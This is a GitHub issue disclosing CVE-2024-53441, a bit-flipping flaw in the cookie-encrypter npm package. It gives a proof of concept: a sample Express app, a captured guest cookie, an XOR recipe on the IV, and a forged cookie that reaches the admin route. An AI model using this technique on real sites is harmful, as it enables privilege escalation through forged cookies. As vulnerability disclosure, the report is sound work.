
Vulnerable to bit flipping CVE-2024-53441

Open · mathysEthical opened this issue · 0 comments

cookie-encrypter Vulnerability

Let's imagine a website with the following source code:

const express = require('express');
const cookieParser = require('cookie-parser');
const cookieEncrypter = require('cookie-encrypter');
const app = express();

// Same secret for both middlewares; cookie-encrypter encrypts outgoing cookie
// values and decrypts incoming ones, but does not authenticate them.
app.use(cookieParser("NicePasswordHereItIsAGoodSecret!"));
app.use(cookieEncrypter("NicePasswordHereItIsAGoodSecret!"));

// Issues an encrypted "role" cookie with the value "guest".
app.get('/login', function(req, res) {
    res.cookie("role", "guest");
    res.send("logged in as guest");
});

// Trusts the decrypted cookie value as the user's role.
app.get("/admin", (req, res) => {
    console.log(req.cookies);
    if (req.cookies.role == "admin") {
        res.send("Access granted.");
    } else {
        res.send("Access denied.");
    }
});

app.listen(80);

We load /login and get a cookie as guest:

e:87c3aa62cf38214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1

We now have to XOR the IV: 87c3aa62cf38214f7c25d66eacb4c95a

We XOR it with guest and with admin to do the bit flip attack; here is a link to help: https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'67756573740000000000000000000000'%7D,'Standard',false)XOR(%7B'option':'Hex','string':'61646d696e0000000000000000000000'%7D,'Standard',false)To_Hex('None',0)&input=ODdjM2FhNjJjZjM4MjE0ZjdjMjVkNjZlYWNiNGM5NWE

So we get the following crafted cookie:

e:81d2a278d538214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1

And now loading /admin we get: Access granted.

To reference this, use CVE-2024-53441

mathysEthical, Dec 06 '24 17:12